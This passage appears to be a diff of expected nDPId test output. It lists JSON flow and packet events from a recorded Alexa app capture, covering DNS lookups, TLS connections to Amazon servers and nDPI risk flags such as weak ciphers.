{"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01823{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01823{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 